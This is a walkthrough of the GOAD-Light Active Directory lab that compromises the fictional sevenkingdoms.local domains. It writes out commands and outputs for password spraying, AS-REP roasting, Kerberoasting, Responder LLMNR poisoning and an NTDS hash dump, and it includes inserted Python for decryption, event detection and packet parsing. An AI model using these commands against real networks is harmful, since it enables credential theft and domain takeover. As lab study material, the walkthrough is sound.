June 30, 2026
GOAD-Light Walkthrough
By Ouakidiyassine
Two domains: sevenkingdoms.local and north.sevenkingdoms.local.
kingslanding.sevenkingdoms.local (192.168.56.10) must therefore be a DC in the first domain.
north.sevenkingdoms.local has two machines, one of which should be its DC. Looking at the nmap results:
- castleblack.north.sevenkingdoms.local (192.168.56.22) has no Kerberos port open, so we rule this one out
- winterfell.north.sevenkingdoms.local (192.168.56.11) has the Kerberos port open, so this one is the DC for the second domain
we add these to our /etc/hosts file:
```
192.168.56.10 kingslanding.sevenkingdoms.local kingslanding
192.168.56.11 winterfell.north.sevenkingdoms.local winterfell
192.168.56.22 castleblack.north.sevenkingdoms.local castleblack
```
SMB signing is shown as false on castleblack, so maybe we can sniff packets going through that host.
First, we try to enumerate users with enum4linux:
Findings:
Domain SID: S-1-5-21-1162251952-1164329401-3212866682
Users:
- arya.stark
- brandon.stark
- hodor
- jeor.mormont
- jon.snow
- rickon.stark
- samwell.tarly:Heartsbane
- sansa.stark
We query LDAP to get the full user list:
```
ldapsearch -LLL -x -H ldap://192.168.56.11 -b 'DC=north,DC=sevenkingdoms,DC=local' -D 'samwell.tarly@north.sevenkingdoms.local' -W
```
And we got the full list:
- Administrator
- arya.stark
- eddard.stark
- catelyn.stark
- robb.stark
- sansa.stark
- brandon.stark
- rickon.stark
- hodor
- jon.snow
- samwell.tarly
- jeor.mormont
- sql_svc
Verified using kerbrute userenum.
Given that we already have samwell.tarly's credentials, we can query the password policy with crackmapexec:
- Minimum password length = 5
- Account lockout threshold = 5
- Locked account duration = 5 min
To avoid account lockouts we use sprayhound to find weakly configured passwords:
hodor:hodor
After inspecting the shares on both winterfell and castleblack we found three files:
- secret.ps1
- script.ps1
- arya.txt
Within script.ps1 we found credentials for jeor.mormont:L0ngCl@w; we test them and they are correct. Within arya.txt we found possible credentials arya.stark:Needle; we test them and they are correct as well.
Within secret.ps1 we found some encrypted data and a key.
Cipher script:
```powershell
$domain="sevenkingdoms.local"
# 32 random bytes: the AES-256 key, written to disk in clear text next to the secret
$EncryptionKeyBytes = New-Object Byte[] 32
[Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)
$EncryptionKeyBytes | Out-File "encryption.key"
$EncryptionKeyData = Get-Content "encryption.key"
# the typed secret is encrypted with that key (not DPAPI), so anyone holding the key can reverse it
Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted"
```
Secret stored:
```powershell
$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
$secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="
```
T.L.
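The blob written by `ConvertFrom-SecureString -Key` is not opaque: it is AES-CBC with a random IV that is stored inside the blob, so whoever holds the key array (here, the same script) recovers the plaintext. The following is an added example (mine, not part of this write-up) that parses the stored secret into its version, IV and ciphertext, and decrypts it when the optional `cryptography` package is present; the key and blob are the ones from secret.ps1 above.

```python
import base64
import binascii

# Key and blob copied from the lab's secret.ps1 shown above (32 bytes -> AES-256).
KEY = bytes([177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247,
             41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91])
SECRET = ("76492d1116743f0423413b16050a5345"
          "MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwA"
          "ZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQA"
          "YQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMA"
          "ZABmAGEANAAyADkAZgAyADIAMwA=")

# Marker PowerShell prepends to every -Key/-SecureKey export. Exports made without
# a key are DPAPI-protected instead and only decrypt for the same user and machine.
KEYED_HEADER = "76492d1116743f0423413b16050a5345"


def parse_securestring_blob(blob):
    """Split a ConvertFrom-SecureString -Key blob into (version, iv, ciphertext).

    Layout: KEYED_HEADER, then Base64 of the UTF-16LE string
    "<version>|<Base64 IV>|<hex ciphertext>". Everything but the key travels
    inside the blob, so the key file is the only protection.
    """
    if not blob.startswith(KEYED_HEADER):
        raise ValueError("not a keyed SecureString export")
    body = base64.b64decode(blob[len(KEYED_HEADER):]).decode("utf-16-le")
    version, iv_b64, ct_hex = body.split("|")
    iv, ciphertext = base64.b64decode(iv_b64), binascii.unhexlify(ct_hex)
    if len(iv) != 16 or len(ciphertext) % 16:
        raise ValueError("IV/ciphertext are not AES block sized")
    return version, iv, ciphertext


def decrypt_securestring_blob(blob, key):
    """AES-CBC/PKCS7 decrypt; the plaintext is the SecureString's UTF-16LE text.
    Returns None when the optional 'cryptography' package is not installed."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    _, iv, ciphertext = parse_securestring_blob(blob)
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS7 padding: wrong key or corrupted blob")
    return padded[:-pad].decode("utf-16-le")


if __name__ == "__main__":
    version, iv, ct = parse_securestring_blob(SECRET)
    print(f"version={version} iv={iv.hex()} ciphertext={len(ct)} bytes")
    print("plaintext:", decrypt_securestring_blob(SECRET, KEY))
```

The 32-byte ciphertext is two AES blocks: 15 UTF-16 characters (30 bytes) plus PKCS7 padding, which already matches the length of the password the walkthrough recovers.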
After deciphering we got this password: powerkingftw135. Now we have to look for the username associated with it.
The T.L. at the end of the file might be a hint. We google GOT characters with the initials T.L.:
Tyrion Lannister, Tywin Lannister, Loras Tyrell
Only three possible names, so we test them using nxc on DC01 (192.168.56.10):
```
SMB 192.168.56.10 445 KINGSLANDING [+] sevenkingdoms.local\tywin.lannister:powerkingftw135
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\tyron.lannister:powerkingftw135 STATUS_LOGON_FAILURE
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\loras.tyrel:powerkingftw135 STATUS_LOGON_FAILURE
```
So basically we got tywin.lannister:powerkingftw135 on DC01; we leave this aside for a second.
On DC02 this is the updated credentials list:
- Administrator
- arya.stark:Needle
- eddard.stark
- catelyn.stark
- robb.stark
- sansa.stark
- brandon.stark
- rickon.stark
- hodor:hodor
- jon.snow
- samwell.tarly:Heartsbane
- jeor.mormont:L0ngCl@w
- sql_svc
And on DC01:
- tywin.lannister:powerkingftw135
Now we will dive into TGT abuse in Kerberos.
A bit of theory:
Kerberos is a ticket-based authentication protocol used by Windows AD. It runs on TCP/UDP port 88; authentication is handled by the Key Distribution Center (KDC), which runs on the DC.
Authentication flow:
- Client -> KDC (Key Distribution Center): the client creates a timestamp and encrypts it with the user's AES key or NTLM hash. The encrypted timestamp is sent to the KDC as an Authentication Service Request (AS-REQ). This proves that the client knows the user's secret without sending the password.
- KDC validates the user: it decrypts the timestamp with the user's stored secret and verifies that the timestamp is within ±5 minutes.
- KDC -> Client (AS-REP with TGT): once the timestamp is validated, the KDC responds with a Ticket Granting Ticket (TGT). The TGT is encrypted and signed with the KRBTGT account's secret, so the client cannot decrypt it.
Requesting a service ticket:
- Client -> KDC (TGS-REQ): the client sends the encrypted TGT back to the KDC and requests a Service Ticket (ST) for a specific service. This request is called a TGS-REQ.
- KDC -> Client (TGS-REP): the KDC decrypts the TGT with the KRBTGT secret, verifies the signature and issues a Service Ticket (ST). The ST is encrypted with the target service account's secret and returned to the client in the TGS-REP.
Accessing the service:
- Client -> Service (AP-REQ): the client connects to the service on the appropriate port and presents the Service Ticket. This request is known as an AP-REQ (Application Request).
Kerberos attacks:
- User enumeration: the attacker sends a bunch of AS-REQs and, based on the KDC's response, can determine whether a username exists or not.
- AS-REP roasting: the attacker obtains the encrypted part of the AS-REP messages for user accounts in order to crack them offline (prerequisite: Kerberos pre-authentication is disabled).
- When pre-auth is enabled the attacker must send the timestamp encrypted with the hash of the user's password. If the timestamp matches the DC's record of the user's password, the DC sends back the AS-REP containing the TGT that will be used for future access requests by this user; it also contains data encrypted with the user's password hash.
- If pre-authentication is disabled, an attacker can request authentication for any such user and receive an AS-REP message from the DC, which they may then attempt to crack offline.
Tool used for this attack: crackmapexec
```
crackmapexec ldap 192.168.56.11 -u hodor -p "hodor" -d winterfell.north.sevenkingdoms.local --asreproast asreproasting.txt
```
By doing that we got brandon.stark's hash, which we attempt to crack using john and the rockyou.txt wordlist.
We got brandon.stark's password: iseedeadpeople
Our updated list:
- Administrator
- arya.stark:Needle
- eddard.stark
- catelyn.stark
- robb.stark
- sansa.stark
- brandon.stark:iseedeadpeople
- rickon.stark
- hodor:hodor
- jon.snow
- samwell.tarly:Heartsbane
- jeor.mormont:L0ngCl@w
- sql_svc
Now, again, a little bit of theory about Kerberoasting:
Kerberoasting consists of requesting service tickets (TGS) from the KDC (Key Distribution Center) for SPNs associated with service accounts, in order to retrieve their hashes and then attempt to crack them offline.
Attack pre-requisites:
- Credentials of a valid domain user account
- Service Principal Names.
- Service ticket for the running service.
To proceed we have to understand what an SPN (Service Principal Name) is.
An SPN is a unique identifier that links a specific network service to the AD account running it; it is required to securely map a client's connection request to the correct service account.
SPN format: ServiceClass/Host:Port/ServiceName
Let's try to find SPNs with the credentials we already have, using the impacket script GetUserSPNs.py:
```
GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile spn.hashes
```
This gave us which user is related to which service, along with their hashed passwords:
| ServicePrincipalName | Name | MemberOf | PasswordLastSet | LastLogon | Delegation |
|---|---|---|---|---|---|
| HTTP/eyrie.north.sevenkingdoms.local | sansa.stark | CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local | 2026-06-28 15:16:56.499955 | `<never>` | |
| CIFS/winterfell.north.sevenkingdoms.local | jon.snow | CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local | 2026-06-28 15:17:21.060699 | `<never>` | constrained |
| HTTP/thewall.north.sevenkingdoms.local | jon.snow | CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local | 2026-06-28 15:17:21.060699 | `<never>` | constrained |
| MSSQLSvc/castelblack.north.sevenkingdoms.local | sql_svc | | 2026-06-28 15:17:36.407837 | 2026-06-28 15:29:24.488089 | |
| MSSQLSvc/castelblack.north.sevenkingdoms.local:1433 | sql_svc | | 2026-06-28 15:17:36.407837 | 2026-06-28 15:29:24.488089 | |

So we can clearly see that sansa.stark has access to some kind of web server with FQDN eyrie.north.sevenkingdoms. Let's try to crack the passwords:
- sansa.stark:345ertdfg
- jon.snow:iknownothing
- sql_svc:
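The Kerberos abuse described above (user enumeration and AS-REP roasting) and the Kerberoasting just shown all leave a trail in the DC's Security log: 4768 events with Status 0x6 for names that do not exist, 4768 events granted with PreAuthType 0, and 4769 service-ticket requests with RC4 (0x17) for SPNs held by user accounts. The following added example (mine, not part of this write-up) runs those three checks over constructed events shaped like the lab's activity; the event dicts and the attacker address 192.168.56.1 are assumptions.

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC; AES tickets log as 0x11/0x12

# Constructed Security-log events with the 4768/4769 EventData field names, shaped
# like this lab: an enumeration burst, one roastable AS-REP and two Kerberoast TGS
# requests from the attacker VM (192.168.56.1 is an assumed address).
ATTACKER, WORKSTATION = "::ffff:192.168.56.1", "::ffff:192.168.56.22"
EVENTS = [
    {"EventID": 4768, "TargetUserName": "brandon.stark", "PreAuthType": "0",
     "TicketEncryptionType": RC4_HMAC, "Status": "0x0", "IpAddress": ATTACKER},
    {"EventID": 4768, "TargetUserName": "jon.snow", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": WORKSTATION},
    {"EventID": 4769, "TargetUserName": "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "sansa.stark", "TicketEncryptionType": RC4_HMAC, "IpAddress": ATTACKER},
    {"EventID": 4769, "TargetUserName": "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "sql_svc", "TicketEncryptionType": RC4_HMAC, "IpAddress": ATTACKER},
    {"EventID": 4769, "TargetUserName": "hodor@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "WINTERFELL$", "TicketEncryptionType": "0x12", "IpAddress": WORKSTATION},
] + [  # failed AS-REQs for names that do not exist: Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN)
    {"EventID": 4768, "TargetUserName": n, "PreAuthType": "-",
     "TicketEncryptionType": "0xffffffff", "Status": "0x6", "IpAddress": ATTACKER}
    for n in ("ned.stark", "tyrion.lannister", "cersei", "joffrey", "varys")
]

def asrep_roast_candidates(events):
    """TGTs granted with PreAuthType 0: no pre-authentication, so the AS-REP's
    encrypted part is crackable offline. Fix the account flag, not the client."""
    return [e["TargetUserName"] for e in events
            if e["EventID"] == 4768 and e["Status"] == "0x0" and e["PreAuthType"] == "0"]

def kerberoast_candidates(events):
    """Service tickets issued with RC4 for SPNs held by user accounts. Computer
    accounts ($) and krbtgt are skipped; AES-only service accounts never log 0x17."""
    return [(e["IpAddress"], e["ServiceName"]) for e in events
            if e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
            and not e["ServiceName"].endswith("$") and e["ServiceName"].lower() != "krbtgt"]

def enumeration_sources(events, threshold=5):
    """Clients that asked for >= threshold distinct unknown principals. The KDC
    error that tells an attacker a name is wrong is logged once per guess."""
    unknown = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == "0x6":
            unknown[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: len(names) for ip, names in unknown.items() if len(names) >= threshold}

if __name__ == "__main__":
    print("AS-REP roastable accounts:", asrep_roast_candidates(EVENTS))
    print("Kerberoast requests (client, SPN account):", kerberoast_candidates(EVENTS))
    print("Enumeration sources:", enumeration_sources(EVENTS))
```

On a real DC the same fields come from `Get-WinEvent -LogName Security` with IDs 4768/4769; a legitimate account that has pre-authentication disabled will also match the first check, which is the point: it should not exist.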
Before diving deeper, let's go back to some theory about Link-Local Multicast Name Resolution (LLMNR):
It is a protocol based on the DNS packet format that allows hosts within the same network to perform name resolution for other hosts.
- Normal scenario: a host on the network requests a name. The DNS server does the resolution and returns the IP to the host; if the name is not found, the DNS server simply returns a not-found error.
- Attack scenario: a host on the network requests a name. The attacker plays the role of the DNS server, tells the host that it knows how to resolve the name and asks for the hash; the host sends the hash.
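LLMNR really is the DNS message format carried on UDP 5355 to a multicast group, which is why any host on the segment can answer it. The added example below (mine, not from the original post) builds and parses an LLMNR query using the RFC 1035 header layout the protocol reuses; seeing such queries on the wire tells a defender which hosts still fall back from DNS to multicast, and the fix is the "Turn off multicast name resolution" policy. The share name in the sample is constructed.

```python
import struct

LLMNR_PORT = 5355  # UDP; queries go to multicast 224.0.0.252 / ff02::1:3
RR_TYPES = {1: "A", 12: "PTR", 28: "AAAA", 255: "ANY"}


def encode_name(name):
    """DNS label encoding: length-prefixed labels ended by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def build_llmnr_query(name, qtype=1, txid=0x1234):
    """Constructed LLMNR query. Header and question are the RFC 1035 layout that
    LLMNR (RFC 4795) reuses: ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT, then
    QNAME/QTYPE/QCLASS. A query has flags 0 and exactly one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_llmnr(pkt):
    """Return (txid, is_response, [(name, rrtype), ...]) for one LLMNR datagram.

    Any query seen on the wire means the sender fell back from DNS to multicast,
    which is exactly the request a rogue responder answers."""
    if len(pkt) < 12:
        raise ValueError("short LLMNR header")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x7800:  # OPCODE bits are always zero in LLMNR
        raise ValueError("non-zero opcode")
    off, questions = 12, []
    for _ in range(qdcount):
        labels = []
        while True:
            length = pkt[off]
            off += 1
            if length == 0:
                break
            if length & 0xC0:
                raise ValueError("compressed names are not handled")
            labels.append(pkt[off:off + length].decode("ascii", "replace"))
            off += length
        qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
        questions.append((".".join(labels), RR_TYPES.get(qtype, str(qtype))))
    return txid, bool(flags & 0x8000), questions  # 0x8000 is the QR (response) bit


if __name__ == "__main__":
    # A mistyped share name that corporate DNS cannot answer (constructed sample).
    pkt = build_llmnr_query("fileshare")
    print(parse_llmnr(pkt))  # (4660, False, [('fileshare', 'A')])
```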
Tool used to execute this attack: the Responder Python package.
```
sudo python3 Responder.py -I vmnet2
```
We got the robb.stark NTLM hash:
```
[SMB] NTLMv1-SSP Client : fe80::e0a8:c9c1:f102:3b7f
[SMB] NTLMv1-SSP Username : NORTH\robb.stark
[SMB] NTLMv1-SSP Hash : robb.stark::NORTH:71FF4CF2BD2B251A00000000000000000000000000000000:E55D1DAE62AAB333F9E9B6949C0640F362AC1370B7D08A1D:fc78272cc77119b8
```
We try to crack this one using hashcat while Responder is still running.
Responder also gave us the eddard.stark NTLM hash:
```
[SMB] NTLMv1-SSP Client : fe80::e0a8:c9c1:f102:3b7f
[SMB] NTLMv1-SSP Username : NORTH\eddard.stark
[SMB] NTLMv1-SSP Hash : eddard.stark::NORTH:3D3143633135183D00000000000000000000000000000000:689C5511D20339184230DD3DCCF93B518F7D14E56CE034C1:e9021f34edd41727
```
hashcat got us robb.stark's password: sexywolfy. Let's verify that while hashcat is still running on eddard.stark's hash:
The password is correct, and apparently robb.stark is a domain admin, so we use crackmapexec to dump the NTDS database:
```
crackmapexec smb 192.168.56.11 -u robb.stark -p "sexywolfy" --ntds
```
```
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
SMB 192.168.56.11 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull…
SMB 192.168.56.11 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
SMB 192.168.56.11 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.56.11 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e8536568c88650d1612cac6a64de60a3:::
SMB 192.168.56.11 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB 192.168.56.11 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
SMB 192.168.56.11 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
SMB 192.168.56.11 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
SMB 192.168.56.11 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
SMB 192.168.56.11 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
SMB 192.168.56.11 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
SMB 192.168.56.11 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
SMB 192.168.56.11 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
SMB 192.168.56.11 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
SMB 192.168.56.11 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
SMB 192.168.56.11 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
SMB 192.168.56.11 445 WINTERFELL sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB 192.168.56.11 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:214edbd524ba1484d45079f774182277:::
SMB 192.168.56.11 445 WINTERFELL CASTELBLACK$:1104:aad3b435b51404eeaad3b435b51404ee:e8d0ef29b45ace65faeb8adfbf0cff78:::
SMB 192.168.56.11 445 WINTERFELL SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:5f7674eeaee941e0e8669931618e8b89:::
SMB 192.168.56.11 445 WINTERFELL [+] Dumped 19 NTDS hashes to /home/notsirius/snap/crackmapexec/275/.cme/logs/WINTERFELL_192.168.56.11_2026-06-30_005230.ntds of which 16 were added to the database
SMB 192.168.56.11 445 WINTERFELL [*] To extract only enabled accounts from the output file, run the following command:
SMB 192.168.56.11 445 WINTERFELL [*] cat /home/notsirius/snap/crackmapexec/275/.cme/logs/WINTERFELL_192.168.56.11_2026-06-30_005230.ntds | grep -iv disabled | cut -d ':' -f1
SMB 192.168.56.11 445 WINTERFELL [*] grep -iv disabled /home/notsirius/snap/crackmapexec/275/.cme/logs/WINTERFELL_192.168.56.11_2026-06-30_005230.ntds | cut -d ':' -f1
```